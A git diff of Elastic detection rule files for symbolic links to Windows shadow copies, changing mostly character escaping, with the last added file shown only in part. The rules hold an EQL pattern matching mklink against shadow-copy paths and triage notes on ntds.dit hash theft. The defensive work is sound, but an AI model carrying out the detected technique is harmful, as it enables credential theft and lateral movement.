diff --git a/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_105.json b/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_105.json
index 4eca3c1dd88..42b10fc5957 100644
--- a/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_105.json
@@ -18,7 +18,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Symbolic Link to Shadow Copy Created", - "note": "## Triage and analysis\n\n### Investigating Symbolic Link to Shadow Copy Created\n\nShadow copies are backups or snapshots of an endpoint's files or volumes while they are in use. Adversaries may attempt to discover and create symbolic links to these shadow copies in order to copy sensitive information offline. If Active Directory (AD) is in use, often the ntds.dit file is a target as it contains password hashes, but an offline copy is needed to extract these hashes and potentially conduct lateral movement.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Determine if a volume shadow copy was recently created on this endpoint.\n- Review privileges of the end user as this requires administrative access.\n- Verify if the ntds.dit file was successfully copied and determine its copy destination.\n- Investigate for registry SYSTEM file copies made recently or saved via Reg.exe.\n- Investigate recent deletions of volume shadow copies.\n- Identify other files potentially copied from volume shadow copy paths directly.\n\n### False positive analysis\n\n- This rule should cause very few false positives. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- NTDS or SAM Database File Copied - 3bc6deaa-fbd4-433a-ae21-3e892f95624f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the entire domain or the `krbtgt` user was compromised:\n - Activate your incident response plan for total Active Directory compromise which should include, but not be limited to, a password reset (twice) of the `krbtgt` user.\n- Locate and remove static files copied from volume shadow copies.\n- Command-Line tool mklink should require administrative access by default unless in developer mode.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nSystem Audit Policies \u003e\nObject Access \u003e\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nThis event will only trigger if symbolic links are created from a new process spawning cmd.exe or 
powershell.exe with the correct arguments.\nDirect access to a shell and calling symbolic link creation tools will not generate an event matching this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "note": "## Triage and analysis\n\n### Investigating Symbolic Link to Shadow Copy Created\n\nShadow copies are backups or snapshots of an endpoint's files or volumes while they are in use. Adversaries may attempt to discover and create symbolic links to these shadow copies in order to copy sensitive information offline. If Active Directory (AD) is in use, often the ntds.dit file is a target as it contains password hashes, but an offline copy is needed to extract these hashes and potentially conduct lateral movement.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Determine if a volume shadow copy was recently created on this endpoint.\n- Review privileges of the end user as this requires administrative access.\n- Verify if the ntds.dit file was successfully copied and determine its copy destination.\n- Investigate for registry SYSTEM file copies made recently or saved via Reg.exe.\n- Investigate recent deletions of volume shadow copies.\n- Identify other files potentially copied from volume shadow copy paths directly.\n\n### False positive analysis\n\n- This rule should cause very few false positives. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- NTDS or SAM Database File Copied - 3bc6deaa-fbd4-433a-ae21-3e892f95624f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the entire domain or the `krbtgt` user was compromised:\n - Activate your incident response plan for total Active Directory compromise which should include, but not be limited to, a password reset (twice) of the `krbtgt` user.\n- Locate and remove static files copied from volume shadow copies.\n- Command-Line tool mklink should require administrative access by default unless in developer mode.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nThis event will only trigger if symbolic links are created from a new process spawning cmd.exe or powershell.exe with the correct arguments.\nDirect access to a shell and calling symbolic link creation tools will not generate an event matching this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name in (\"Cmd.Exe\",\"PowerShell.EXE\") and\n\n /* Create Symbolic Link to Shadow Copies */\n process.args : (\"*mklink*\", \"*SymbolicLink*\") and process.command_line : (\"*HarddiskVolumeShadowCopy*\")\n", "references": [ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mklink", 
@@ -65,7 +65,7 @@
 ],
 "risk_score": 47,
 "rule_id": "d117cbb4-7d56-41b4-b999-bdf8c25648a0",
- "setup": "Ensure advanced audit policies for Windows are enabled, specifically:\nObject Access policies Event ID 4656 (Handle to an Object was Requested)\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nSystem Audit Policies \u003e\nObject Access \u003e\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nThis event will only trigger if symbolic links are created from a new process spawning cmd.exe or powershell.exe with the correct arguments.\nDirect access to a shell and calling symbolic link creation tools will not generate an event matching this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "Ensure advanced audit policies for Windows are enabled, specifically:\nObject Access policies Event ID 4656 (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nThis event will only trigger if symbolic links are created from a new process spawning cmd.exe or powershell.exe with the correct arguments.\nDirect access to a shell and calling symbolic link creation tools will not generate an event matching this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -77,7 +77,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_106.json b/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_106.json
index 213eda500b0..6f5d8ca0402 100644
--- a/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_106.json
@@ -18,7 +18,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Symbolic Link to Shadow Copy Created", - "note": "## Triage and analysis\n\n### Investigating Symbolic Link to Shadow Copy Created\n\nShadow copies are backups or snapshots of an endpoint's files or volumes while they are in use. Adversaries may attempt to discover and create symbolic links to these shadow copies in order to copy sensitive information offline. If Active Directory (AD) is in use, often the ntds.dit file is a target as it contains password hashes, but an offline copy is needed to extract these hashes and potentially conduct lateral movement.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Determine if a volume shadow copy was recently created on this endpoint.\n- Review privileges of the end user as this requires administrative access.\n- Verify if the ntds.dit file was successfully copied and determine its copy destination.\n- Investigate for registry SYSTEM file copies made recently or saved via Reg.exe.\n- Investigate recent deletions of volume shadow copies.\n- Identify other files potentially copied from volume shadow copy paths directly.\n\n### False positive analysis\n\n- This rule should cause very few false positives. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- NTDS or SAM Database File Copied - 3bc6deaa-fbd4-433a-ae21-3e892f95624f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the entire domain or the `krbtgt` user was compromised:\n - Activate your incident response plan for total Active Directory compromise which should include, but not be limited to, a password reset (twice) of the `krbtgt` user.\n- Locate and remove static files copied from volume shadow copies.\n- Command-Line tool mklink should require administrative access by default unless in developer mode.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nSystem Audit Policies \u003e\nObject Access \u003e\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nThis event will only trigger if symbolic links are created from a new process spawning cmd.exe or 
powershell.exe with the correct arguments.\nDirect access to a shell and calling symbolic link creation tools will not generate an event matching this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "note": "## Triage and analysis\n\n### Investigating Symbolic Link to Shadow Copy Created\n\nShadow copies are backups or snapshots of an endpoint's files or volumes while they are in use. Adversaries may attempt to discover and create symbolic links to these shadow copies in order to copy sensitive information offline. If Active Directory (AD) is in use, often the ntds.dit file is a target as it contains password hashes, but an offline copy is needed to extract these hashes and potentially conduct lateral movement.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Determine if a volume shadow copy was recently created on this endpoint.\n- Review privileges of the end user as this requires administrative access.\n- Verify if the ntds.dit file was successfully copied and determine its copy destination.\n- Investigate for registry SYSTEM file copies made recently or saved via Reg.exe.\n- Investigate recent deletions of volume shadow copies.\n- Identify other files potentially copied from volume shadow copy paths directly.\n\n### False positive analysis\n\n- This rule should cause very few false positives. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- NTDS or SAM Database File Copied - 3bc6deaa-fbd4-433a-ae21-3e892f95624f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the entire domain or the `krbtgt` user was compromised:\n - Activate your incident response plan for total Active Directory compromise which should include, but not be limited to, a password reset (twice) of the `krbtgt` user.\n- Locate and remove static files copied from volume shadow copies.\n- Command-Line tool mklink should require administrative access by default unless in developer mode.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nThis event will only trigger if symbolic links are created from a new process spawning cmd.exe or powershell.exe with the correct arguments.\nDirect access to a shell and calling symbolic link creation tools will not generate an event matching this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name in (\"Cmd.Exe\",\"PowerShell.EXE\") and\n\n /* Create Symbolic Link to Shadow Copies */\n process.args : (\"*mklink*\", \"*SymbolicLink*\") and process.command_line : (\"*HarddiskVolumeShadowCopy*\")\n", "references": [ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mklink", 
@@ -65,7 +65,7 @@
 ],
 "risk_score": 47,
 "rule_id": "d117cbb4-7d56-41b4-b999-bdf8c25648a0",
- "setup": "Ensure advanced audit policies for Windows are enabled, specifically:\nObject Access policies Event ID 4656 (Handle to an Object was Requested)\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nSystem Audit Policies \u003e\nObject Access \u003e\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nThis event will only trigger if symbolic links are created from a new process spawning cmd.exe or powershell.exe with the correct arguments.\nDirect access to a shell and calling symbolic link creation tools will not generate an event matching this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "Ensure advanced audit policies for Windows are enabled, specifically:\nObject Access policies Event ID 4656 (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nThis event will only trigger if symbolic links are created from a new process spawning cmd.exe or powershell.exe with the correct arguments.\nDirect access to a shell and calling symbolic link creation tools will not generate an event matching this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom 
pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -78,7 +78,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_107.json b/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_107.json
index a1afaf5de17..c40faf846b3 100644
--- a/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_107.json
@@ -18,7 +18,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Symbolic Link to Shadow Copy Created",
- "note": "## Triage and analysis\n\n### Investigating Symbolic Link to Shadow Copy Created\n\nShadow copies are backups or snapshots of an endpoint's files or volumes while they are in use. Adversaries may attempt to discover and create symbolic links to these shadow copies in order to copy sensitive information offline. If Active Directory (AD) is in use, often the ntds.dit file is a target as it contains password hashes, but an offline copy is needed to extract these hashes and potentially conduct lateral movement.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- NTDS or SAM Database File Copied - 3bc6deaa-fbd4-433a-ae21-3e892f95624f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the entire domain or the `krbtgt` user was compromised:\n - Activate your incident response plan for total Active Directory compromise which should include, but not be limited to, a password reset (twice) of the `krbtgt` user.\n- Locate and remove static files copied from volume shadow copies.\n- Command-Line tool mklink should require administrative access by default unless in developer mode.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nSystem Audit Policies \u003e\nObject Access \u003e\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nThis event will only trigger if symbolic links are created from a new process spawning cmd.exe or 
powershell.exe with the correct arguments.\nDirect access to a shell and calling symbolic link creation tools will not generate an event matching this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "note": "## Triage and analysis\n\n### Investigating Symbolic Link to Shadow Copy Created\n\nShadow copies are backups or snapshots of an endpoint's files or volumes while they are in use. Adversaries may attempt to discover and create symbolic links to these shadow copies in order to copy sensitive information offline. If Active Directory (AD) is in use, often the ntds.dit file is a target as it contains password hashes, but an offline copy is needed to extract these hashes and potentially conduct lateral movement.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Determine if a volume shadow copy was recently created on this endpoint.\n- Review privileges of the end user as this requires administrative access.\n- Verify if the ntds.dit file was successfully copied and determine its copy destination.\n- Investigate for registry SYSTEM file copies made recently or saved via Reg.exe.\n- Investigate recent deletions of volume shadow copies.\n- Identify other files potentially copied from volume shadow copy paths directly.\n\n### False positive analysis\n\n- This rule should cause very few false positives. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- NTDS or SAM Database File Copied - 3bc6deaa-fbd4-433a-ae21-3e892f95624f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the entire domain or the `krbtgt` user was compromised:\n - Activate your incident response plan for total Active Directory compromise which should include, but not be limited to, a password reset (twice) of the `krbtgt` user.\n- Locate and remove static files copied from volume shadow copies.\n- Command-Line tool mklink should require administrative access by default unless in developer mode.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nThis event will only trigger if symbolic links are created from a new process spawning cmd.exe or powershell.exe with the correct arguments.\nDirect access to a shell and calling symbolic link creation tools will not generate an event matching this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name in (\"Cmd.Exe\",\"PowerShell.EXE\") and\n\n /* Create Symbolic Link to Shadow Copies */\n process.args : (\"*mklink*\", \"*SymbolicLink*\") and process.command_line : (\"*HarddiskVolumeShadowCopy*\")\n",
 "references": [
 "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mklink",
@@ -65,7 +65,7 @@
 ],
 "risk_score": 47,
 "rule_id": "d117cbb4-7d56-41b4-b999-bdf8c25648a0",
- "setup": "Ensure advanced audit policies for Windows are enabled, specifically:\nObject Access policies Event ID 4656 (Handle to an Object was Requested)\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nSystem Audit Policies \u003e\nObject Access \u003e\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nThis event will only trigger if symbolic links are created from a new process spawning cmd.exe or powershell.exe with the correct arguments.\nDirect access to a shell and calling symbolic link creation tools will not generate an event matching this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "Ensure advanced audit policies for Windows are enabled, specifically:\nObject Access policies Event ID 4656 (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nThis event will only trigger if symbolic links are created from a new process spawning cmd.exe or powershell.exe with the correct arguments.\nDirect access to a shell and calling symbolic link creation tools will not generate an event matching this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom 
pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -78,7 +78,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_108.json b/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_108.json
index 8785f14ec6c..46b67b8efdb 100644
--- a/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_108.json
@@ -65,7 +65,7 @@
 ],
 "risk_score": 47,
 "rule_id": "d117cbb4-7d56-41b4-b999-bdf8c25648a0",
- "setup": "\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nSystem Audit Policies \u003e\nObject Access \u003e\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nThis event will only trigger if symbolic links are created from a new process spawning cmd.exe or powershell.exe with the correct arguments.\nDirect access to a shell and calling symbolic link creation tools will not generate an event matching this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nThis event will only trigger if symbolic links are created from a new process spawning cmd.exe or powershell.exe 
with the correct arguments.\nDirect access to a shell and calling symbolic link creation tools will not generate an event matching this rule.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -78,7 +78,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_109.json b/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_109.json
new file mode 100644
index 00000000000..60526f4e918
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/d117cbb4-7d56-41b4-b999-bdf8c25648a0_109.json
@@ -0,0 +1,119 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic",
+ "Austin Songer"
+ ],
+ "description": "Identifies the creation of symbolic links to a shadow copy. Symbolic links can be used to access files in the shadow copy, including sensitive files such as ntds.dit, System Boot Key and browser offline credentials.",
+ "false_positives": [
+ "Legitimate administrative activity related to shadow copies."
+ ],
+ "from": "now-9m",
+ "index": [
+ "winlogbeat-*",
+ "logs-endpoint.events.*",
+ "logs-windows.*",
+ "endgame-*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "Symbolic Link to Shadow Copy Created",
+ "note": "## Triage and analysis\n\n### Investigating Symbolic Link to Shadow Copy Created\n\nShadow copies are backups or snapshots of an endpoint's files or volumes while they are in use. Adversaries may attempt to discover and create symbolic links to these shadow copies in order to copy sensitive information offline. If Active Directory (AD) is in use, often the ntds.dit file is a target as it contains password hashes, but an offline copy is needed to extract these hashes and potentially conduct lateral movement.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Determine if a volume shadow copy was recently created on this endpoint.\n- Review privileges of the end user as this requires administrative access.\n- Verify if the ntds.dit file was successfully copied and determine its copy destination.\n- Investigate for registry SYSTEM file copies made recently or saved via Reg.exe.\n- Investigate recent deletions of volume shadow copies.\n- Identify other files potentially copied from volume shadow copy paths directly.\n\n### False positive analysis\n\n- This rule should cause very few false positives. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- NTDS or SAM Database File Copied - 3bc6deaa-fbd4-433a-ae21-3e892f95624f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the entire domain or the `krbtgt` user was compromised:\n - Activate your incident response plan for total Active Directory compromise 